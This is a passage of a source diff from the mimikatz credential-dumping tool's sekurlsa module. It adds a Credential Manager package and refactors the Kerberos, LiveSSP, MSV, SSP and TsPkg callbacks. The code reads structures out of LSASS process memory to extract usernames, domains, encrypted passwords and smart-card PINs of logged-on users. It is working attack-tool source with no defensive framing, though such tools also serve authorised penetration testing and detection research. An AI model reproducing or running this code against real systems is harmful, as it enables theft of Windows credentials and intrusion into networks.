FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY_60, user),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY_60, server2),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY_60, cbEncPassword),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY_60, encPassword),
|
||||
},
|
||||
{
|
||||
sizeof(KIWI_CREDMAN_LIST_ENTRY),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY, Flink),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY, user),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY, server2),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY, cbEncPassword),
|
||||
FIELD_OFFSET(KIWI_CREDMAN_LIST_ENTRY, encPassword),
|
||||
},
|
||||
};
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_credman(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData)
|
||||
{
|
||||
KIWI_CREDMAN_SET_LIST_ENTRY setList;
|
||||
KIWI_CREDMAN_LIST_STARTER listStarter;
|
||||
DWORD nbCred = 0;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {&setList, &hLocalMemory}, aLsassMemory = {pData->pCredentialManager, pData->cLsass->hLsassMem};
|
||||
PVOID pRef;
|
||||
KIWI_GENERIC_PRIMARY_CREDENTIAL kiwiCreds;
|
||||
ULONG CredOffsetIndex;
|
||||
|
||||
if(pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_VISTA)
|
||||
CredOffsetIndex = 0;
|
||||
else if(pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_7)
|
||||
CredOffsetIndex = 1;
|
||||
else
|
||||
CredOffsetIndex = 2;
|
||||
|
||||
if(aLsassMemory.address)
|
||||
{
|
||||
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CREDMAN_SET_LIST_ENTRY)))
|
||||
{
|
||||
aLocalMemory.address = &listStarter;
|
||||
if(aLsassMemory.address = setList.list1)
|
||||
{
|
||||
pRef = (PBYTE) setList.list1 + FIELD_OFFSET(KIWI_CREDMAN_LIST_STARTER, start);
|
||||
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CREDMAN_LIST_STARTER)))
|
||||
{
|
||||
if(aLocalMemory.address = LocalAlloc(LPTR, credhelper[CredOffsetIndex].structSize))
|
||||
{
|
||||
if(aLsassMemory.address = listStarter.start)
|
||||
{
|
||||
while(aLsassMemory.address != pRef)
|
||||
{
|
||||
aLsassMemory.address = (PBYTE) aLsassMemory.address - credhelper[CredOffsetIndex].offsetFLink;
|
||||
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, credhelper[CredOffsetIndex].structSize))
|
||||
{
|
||||
kprintf(L"\n\t [%08x]", nbCred);
|
||||
kiwiCreds.UserName = *(PUNICODE_STRING) ((PBYTE) aLocalMemory.address + credhelper[CredOffsetIndex].offsetUsername);
|
||||
kiwiCreds.Domaine = *(PUNICODE_STRING) ((PBYTE) aLocalMemory.address + credhelper[CredOffsetIndex].offsetDomain);
|
||||
kiwiCreds.Password.Length = kiwiCreds.Password.MaximumLength = *(PUSHORT) ((PBYTE) aLocalMemory.address + credhelper[CredOffsetIndex].offsetCbPassword);;
|
||||
kiwiCreds.Password.Buffer = *(PWSTR *) ((PBYTE) aLocalMemory.address + credhelper[CredOffsetIndex].offsetPassword);
|
||||
kuhl_m_sekurlsa_genericCredsOutput(&kiwiCreds, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_CREDMANPASS, externalCallback, externalCallbackData);
|
||||
aLsassMemory.address = *(PVOID *) ((PBYTE) aLocalMemory.address + credhelper[CredOffsetIndex].offsetFLink);
|
||||
}
|
||||
else break;
|
||||
nbCred++;
|
||||
}
|
||||
}
|
||||
LocalFree(aLocalMemory.address);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
@ -0,0 +1,104 @@
|
||||
/* Benjamin DELPY `gentilkiwi`
|
||||
http://blog.gentilkiwi.com
|
||||
benjamin@gentilkiwi.com
|
||||
Licence : http://creativecommons.org/licenses/by/3.0/fr/
|
||||
*/
|
||||
#pragma once
|
||||
#include "../kuhl_m_sekurlsa.h"
|
||||
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_credman_package;
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_credman(int argc, wchar_t * argv[]);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_credman(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData);
|
||||
|
||||
typedef struct _CREDMAN_INFOS {
|
||||
ULONG structSize;
|
||||
ULONG offsetFLink;
|
||||
ULONG offsetUsername;
|
||||
ULONG offsetDomain;
|
||||
ULONG offsetCbPassword;
|
||||
ULONG offsetPassword;
|
||||
} CREDMAN_INFOS, *PCREDMAN_INFOS;
|
||||
|
||||
typedef struct _KIWI_CREDMAN_LIST_ENTRY_5 {
|
||||
ULONG cbEncPassword;
|
||||
PWSTR encPassword;
|
||||
ULONG unk0;
|
||||
ULONG unk1;
|
||||
PVOID unk2;
|
||||
PVOID unk3;
|
||||
PWSTR UserName;
|
||||
ULONG cbUserName;
|
||||
struct _KIWI_CREDMAN_LIST_ENTRY *Flink;
|
||||
struct _KIWI_CREDMAN_LIST_ENTRY *Blink;
|
||||
UNICODE_STRING server1;
|
||||
PVOID unk6;
|
||||
PVOID unk7;
|
||||
UNICODE_STRING user;
|
||||
ULONG unk8;
|
||||
UNICODE_STRING server2;
|
||||
} KIWI_CREDMAN_LIST_ENTRY_5, *PKIWI_CREDMAN_LIST_ENTRY_5;
|
||||
|
||||
typedef struct _KIWI_CREDMAN_LIST_ENTRY_60 {
|
||||
ULONG cbEncPassword;
|
||||
PWSTR encPassword;
|
||||
ULONG unk0;
|
||||
ULONG unk1;
|
||||
PVOID unk2;
|
||||
PVOID unk3;
|
||||
PWSTR UserName;
|
||||
ULONG cbUserName;
|
||||
struct _KIWI_CREDMAN_LIST_ENTRY *Flink;
|
||||
struct _KIWI_CREDMAN_LIST_ENTRY *Blink;
|
||||
UNICODE_STRING type;
|
||||
PVOID unk5;
|
||||
UNICODE_STRING server1;
|
||||
PVOID unk6;
|
||||
PVOID unk7;
|
||||
PVOID unk8;
|
||||
PVOID unk9;
|
||||
PVOID unk10;
|
||||
UNICODE_STRING user;
|
||||
ULONG unk11;
|
||||
UNICODE_STRING server2;
|
||||
} KIWI_CREDMAN_LIST_ENTRY_60, *PKIWI_CREDMAN_LIST_ENTRY_60;
|
||||
|
||||
typedef struct _KIWI_CREDMAN_LIST_ENTRY {
|
||||
ULONG cbEncPassword;
|
||||
PWSTR encPassword;
|
||||
ULONG unk0;
|
||||
ULONG unk1;
|
||||
PVOID unk2;
|
||||
PVOID unk3;
|
||||
PWSTR UserName;
|
||||
ULONG cbUserName;
|
||||
struct _KIWI_CREDMAN_LIST_ENTRY *Flink;
|
||||
struct _KIWI_CREDMAN_LIST_ENTRY *Blink;
|
||||
LIST_ENTRY unk4;
|
||||
UNICODE_STRING type;
|
||||
PVOID unk5;
|
||||
UNICODE_STRING server1;
|
||||
PVOID unk6;
|
||||
PVOID unk7;
|
||||
PVOID unk8;
|
||||
PVOID unk9;
|
||||
PVOID unk10;
|
||||
UNICODE_STRING user;
|
||||
ULONG unk11;
|
||||
UNICODE_STRING server2;
|
||||
} KIWI_CREDMAN_LIST_ENTRY, *PKIWI_CREDMAN_LIST_ENTRY;
|
||||
|
||||
typedef struct _KIWI_CREDMAN_LIST_STARTER {
|
||||
ULONG unk0;
|
||||
PKIWI_CREDMAN_LIST_ENTRY start;
|
||||
//...
|
||||
} KIWI_CREDMAN_LIST_STARTER, *PKIWI_CREDMAN_LIST_STARTER;
|
||||
|
||||
typedef struct _KIWI_CREDMAN_SET_LIST_ENTRY {
|
||||
struct _KIWI_CREDMAN_SET_LIST_ENTRY *Flink;
|
||||
struct _KIWI_CREDMAN_SET_LIST_ENTRY *Blink;
|
||||
ULONG unk0;
|
||||
PKIWI_CREDMAN_LIST_STARTER list1;
|
||||
PKIWI_CREDMAN_LIST_STARTER list2;
|
||||
// ...
|
||||
} KIWI_CREDMAN_SET_LIST_ENTRY, *PKIWI_CREDMAN_SET_LIST_ENTRY;
|
||||
@ -124,34 +124,34 @@ LONG kuhl_m_sekurlsa_kerberos_enum(PKUHL_M_SEKURLSA_EXTERNAL callback, LPVOID st
|
||||
return kuhl_m_sekurlsa_getLogonData(kuhl_m_sekurlsa_kerberos_single_package, 1, callback, state);
|
||||
}
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_kerberos(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PLUID logId, IN PVOID pCredentials, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData)
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_kerberos(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData)
|
||||
{
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &hLocalMemory}, aLsassMemory = {NULL, cLsass->hLsassMem};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &hLocalMemory}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
|
||||
UNICODE_STRING pinCode;
|
||||
|
||||
if(kuhl_m_sekurlsa_kerberos_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(cLsass, &kuhl_m_sekurlsa_kerberos_package.Module, KerberosReferences, sizeof(KerberosReferences) / sizeof(KULL_M_PATCH_GENERIC), &KerbLogonSessionListOrTable, NULL, &KerbOffsetIndex))
|
||||
if(kuhl_m_sekurlsa_kerberos_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_kerberos_package.Module, KerberosReferences, sizeof(KerberosReferences) / sizeof(KULL_M_PATCH_GENERIC), &KerbLogonSessionListOrTable, NULL, &KerbOffsetIndex))
|
||||
{
|
||||
aLsassMemory.address = KerbLogonSessionListOrTable;
|
||||
if(cLsass->osContext.MajorVersion < 6)
|
||||
aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, kerbHelper[KerbOffsetIndex].offsetLuid, logId);
|
||||
if(pData->cLsass->osContext.MajorVersion < 6)
|
||||
aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, kerbHelper[KerbOffsetIndex].offsetLuid, pData->LogonId);
|
||||
else
|
||||
aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromAVLByLuid(&aLsassMemory, kerbHelper[KerbOffsetIndex].offsetLuid, logId);
|
||||
aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromAVLByLuid(&aLsassMemory, kerbHelper[KerbOffsetIndex].offsetLuid, pData->LogonId);
|
||||
|
||||
if(aLsassMemory.address)
|
||||
{
|
||||
if(aLocalMemory.address = LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structSize))
|
||||
{
|
||||
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, kerbHelper[KerbOffsetIndex].structSize))
|
||||
{
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) ((PBYTE) aLocalMemory.address + kerbHelper[KerbOffsetIndex].offsetCreds), logId, 0, externalCallback, externalCallbackData);
|
||||
{
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) ((PBYTE) aLocalMemory.address + kerbHelper[KerbOffsetIndex].offsetCreds), pData->LogonId, 0, externalCallback, externalCallbackData);
|
||||
if(aLsassMemory.address = (*(PUNICODE_STRING *) ((PBYTE) aLocalMemory.address + kerbHelper[KerbOffsetIndex].offsetPin)))
|
||||
{
|
||||
aLocalMemory.address = &pinCode;
|
||||
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(UNICODE_STRING)))
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) &pinCode, logId, KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE | ((cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_VISTA) ? KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT : 0), externalCallback, externalCallbackData);
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) &pinCode, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE | ((pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_VISTA) ? KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT : 0), externalCallback, externalCallbackData);
|
||||
}
|
||||
}
|
||||
}
|
||||
LocalFree(aLocalMemory.address);
|
||||
}
|
||||
}
|
||||
|
||||
@ -10,7 +10,7 @@ KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_kerberos_package;
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_kerberos(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_sekurlsa_kerberos_tickets(int argc, wchar_t * argv[]);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_kerberos(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PLUID logId, IN PVOID pCredentials, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_kerberos(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData);
|
||||
BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_kerberos_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData);
|
||||
|
||||
void kuhl_m_sekurlsa_kerberos_enum_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN PVOID tickets);
|
||||
|
||||
@ -31,17 +31,17 @@ LONG kuhl_m_sekurlsa_livessp_enum(PKUHL_M_SEKURLSA_EXTERNAL callback, LPVOID sta
|
||||
return kuhl_m_sekurlsa_getLogonData(kuhl_m_sekurlsa_livessp_single_package, 1, callback, state);
|
||||
}
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_livessp(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PLUID logId, IN PVOID pCredentials, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData)
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_livessp(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData)
|
||||
{
|
||||
KIWI_LIVESSP_LIST_ENTRY credentials;
|
||||
KIWI_LIVESSP_PRIMARY_CREDENTIAL primaryCredential;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {&credentials, &hLocalMemory}, aLsassMemory = {NULL, cLsass->hLsassMem};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {&credentials, &hLocalMemory}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
|
||||
|
||||
if(kuhl_m_sekurlsa_livessp_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(cLsass, &kuhl_m_sekurlsa_livessp_package.Module, LiveReferences, sizeof(LiveReferences) / sizeof(KULL_M_PATCH_GENERIC), (PVOID *) &LiveGlobalLogonSessionList, NULL, NULL))
|
||||
if(kuhl_m_sekurlsa_livessp_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_livessp_package.Module, LiveReferences, sizeof(LiveReferences) / sizeof(KULL_M_PATCH_GENERIC), (PVOID *) &LiveGlobalLogonSessionList, NULL, NULL))
|
||||
{
|
||||
aLsassMemory.address = LiveGlobalLogonSessionList;
|
||||
if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_LIVESSP_LIST_ENTRY, LocallyUniqueIdentifier), logId))
|
||||
if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_LIVESSP_LIST_ENTRY, LocallyUniqueIdentifier), pData->LogonId))
|
||||
{
|
||||
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_LIVESSP_LIST_ENTRY)))
|
||||
{
|
||||
@ -49,7 +49,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_livessp(IN PKUHL_M_SEKURLSA_CO
|
||||
{
|
||||
aLocalMemory.address = &primaryCredential;
|
||||
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_LIVESSP_PRIMARY_CREDENTIAL)))
|
||||
kuhl_m_sekurlsa_genericCredsOutput(&primaryCredential.credentials, logId, (cLsass->osContext.BuildNumber != 9431) ? 0 : KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT, externalCallback, externalCallbackData);
|
||||
kuhl_m_sekurlsa_genericCredsOutput(&primaryCredential.credentials, pData->LogonId, (pData->cLsass->osContext.BuildNumber != 9431) ? 0 : KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT, externalCallback, externalCallbackData);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
@ -9,7 +9,7 @@
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_livessp_package;
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_livessp(int argc, wchar_t * argv[]);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_livessp(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PLUID logId, IN PVOID pCredentials, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_livessp(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData);
|
||||
|
||||
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL
|
||||
{
|
||||
|
||||
@ -22,10 +22,10 @@ LONG kuhl_m_sekurlsa_msv_enum(PKUHL_M_SEKURLSA_EXTERNAL callback, LPVOID state)
|
||||
return kuhl_m_sekurlsa_getLogonData(kuhl_m_sekurlsa_msv_single_package, 1, callback, state);
|
||||
}
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_msv(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PLUID logId, IN PVOID pCredentials, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData)
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_msv(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData)
|
||||
{
|
||||
MSV1_0_STD_DATA stdData = {logId, externalCallback, externalCallbackData};
|
||||
kuhl_m_sekurlsa_msv_enum_cred(cLsass, pCredentials, kuhl_m_sekurlsa_msv_enum_cred_callback_std, &stdData);
|
||||
MSV1_0_STD_DATA stdData = {pData->LogonId, externalCallback, externalCallbackData};
|
||||
kuhl_m_sekurlsa_msv_enum_cred(pData->cLsass, pData->pCredentials, kuhl_m_sekurlsa_msv_enum_cred_callback_std, &stdData);
|
||||
}
|
||||
|
||||
BOOL CALLBACK kuhl_m_sekurlsa_msv_enum_cred_callback_std(IN PKIWI_MSV1_0_PRIMARY_CREDENTIALS pCredentials, IN DWORD AuthenticationPackageId, IN PKULL_M_MEMORY_ADDRESS origBufferAddress, IN OPTIONAL LPVOID pOptionalData)
|
||||
|
||||
@ -59,7 +59,7 @@ KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_msv_package;
|
||||
NTSTATUS kuhl_m_sekurlsa_msv(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_sekurlsa_msv_pth(int argc, wchar_t * argv[]);
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_msv(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PLUID logId, IN PVOID pCredentials, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_msv(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData);
|
||||
BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_msv_pth(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData);
|
||||
|
||||
VOID kuhl_m_sekurlsa_msv_enum_cred(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PVOID pCredentials, IN PKUHL_M_SEKURLSA_MSV_CRED_CALLBACK credCallback, IN PVOID optionalData);
|
||||
|
||||
@ -36,14 +36,14 @@ LONG kuhl_m_sekurlsa_ssp_enum(PKUHL_M_SEKURLSA_EXTERNAL callback, LPVOID state)
|
||||
return kuhl_m_sekurlsa_getLogonData(kuhl_m_sekurlsa_ssp_single_package, 1, callback, state);
|
||||
}
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_ssp(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PLUID logId, IN PVOID pCredentials, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData)
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_ssp(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData)
|
||||
{
|
||||
KIWI_SSP_CREDENTIAL_LIST_ENTRY mesCredentials;
|
||||
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {&mesCredentials, &hBuffer}, aLsass = {NULL, cLsass->hLsassMem};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {&mesCredentials, &hBuffer}, aLsass = {NULL, pData->cLsass->hLsassMem};
|
||||
ULONG monNb = 0;
|
||||
|
||||
if(kuhl_m_sekurlsa_ssp_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(cLsass, &kuhl_m_sekurlsa_ssp_package.Module, SspReferences, sizeof(SspReferences) / sizeof(KULL_M_PATCH_GENERIC), (PVOID *) &SspCredentialList, NULL, NULL))
|
||||
if(kuhl_m_sekurlsa_ssp_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_ssp_package.Module, SspReferences, sizeof(SspReferences) / sizeof(KULL_M_PATCH_GENERIC), (PVOID *) &SspCredentialList, NULL, NULL))
|
||||
{
|
||||
aLsass.address = SspCredentialList;
|
||||
if(kull_m_memory_copy(&aBuffer, &aLsass, sizeof(LIST_ENTRY)))
|
||||
@ -53,10 +53,10 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_ssp(IN PKUHL_M_SEKURLSA_CONTEX
|
||||
{
|
||||
if(kull_m_memory_copy(&aBuffer, &aLsass, sizeof(KIWI_SSP_CREDENTIAL_LIST_ENTRY)))
|
||||
{
|
||||
if(RtlEqualLuid(logId, &mesCredentials.LogonId))
|
||||
if(RtlEqualLuid(pData->LogonId, &mesCredentials.LogonId))
|
||||
{
|
||||
kprintf(L"\n\t [%08x]", monNb++);
|
||||
kuhl_m_sekurlsa_genericCredsOutput(&mesCredentials.credentials, logId, KUHL_SEKURLSA_CREDS_DISPLAY_SSP | KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN, externalCallback, externalCallbackData);
|
||||
kuhl_m_sekurlsa_genericCredsOutput(&mesCredentials.credentials, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_SSP | KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN, externalCallback, externalCallbackData);
|
||||
}
|
||||
aLsass.address = mesCredentials.Flink;
|
||||
}
|
||||
|
||||
@ -9,7 +9,7 @@
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_ssp_package;
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_ssp(int argc, wchar_t * argv[]);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_ssp(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PLUID logId, IN PVOID pCredentials, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData);
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_ssp(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData);
|
||||
|
||||
typedef struct _KIWI_SSP_CREDENTIAL_LIST_ENTRY {
|
||||
struct _KIWI_SSP_CREDENTIAL_LIST_ENTRY *Flink;
|
||||
|
||||
@ -33,19 +33,19 @@ LONG kuhl_m_sekurlsa_tspkg_enum(PKUHL_M_SEKURLSA_EXTERNAL callback, LPVOID state
|
||||
return kuhl_m_sekurlsa_getLogonData(kuhl_m_sekurlsa_tspkg_single_package, 1, callback, state);
|
||||
}
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_tspkg(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PLUID logId, IN PVOID pCredentials, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData)
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_tspkg(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData)
|
||||
{
|
||||
KIWI_TS_CREDENTIAL credentials;
|
||||
KIWI_TS_PRIMARY_CREDENTIAL primaryCredential;
|
||||
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {&credentials, &hLocalMemory}, aLsassMemory = {NULL, cLsass->hLsassMem};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {&credentials, &hLocalMemory}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
|
||||
PVOID buffer = NULL;
|
||||
|
||||
if(kuhl_m_sekurlsa_tspkg_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(cLsass, &kuhl_m_sekurlsa_tspkg_package.Module, TsPkgReferences, sizeof(TsPkgReferences) / sizeof(KULL_M_PATCH_GENERIC), (PVOID *) &TSGlobalCredTable, NULL, NULL))
|
||||
if(kuhl_m_sekurlsa_tspkg_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_tspkg_package.Module, TsPkgReferences, sizeof(TsPkgReferences) / sizeof(KULL_M_PATCH_GENERIC), (PVOID *) &TSGlobalCredTable, NULL, NULL))
|
||||
{
|
||||
aLsassMemory.address = TSGlobalCredTable;
|
||||
if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromAVLByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_TS_CREDENTIAL, LocallyUniqueIdentifier), logId))
|
||||
if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromAVLByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_TS_CREDENTIAL, LocallyUniqueIdentifier), pData->LogonId))
|
||||
{
|
||||
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_TS_CREDENTIAL)))
|
||||
{
|
||||
@ -53,7 +53,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_tspkg(IN PKUHL_M_SEKURLSA_CONT
|
||||
{
|
||||
aLocalMemory.address = &primaryCredential;
|
||||
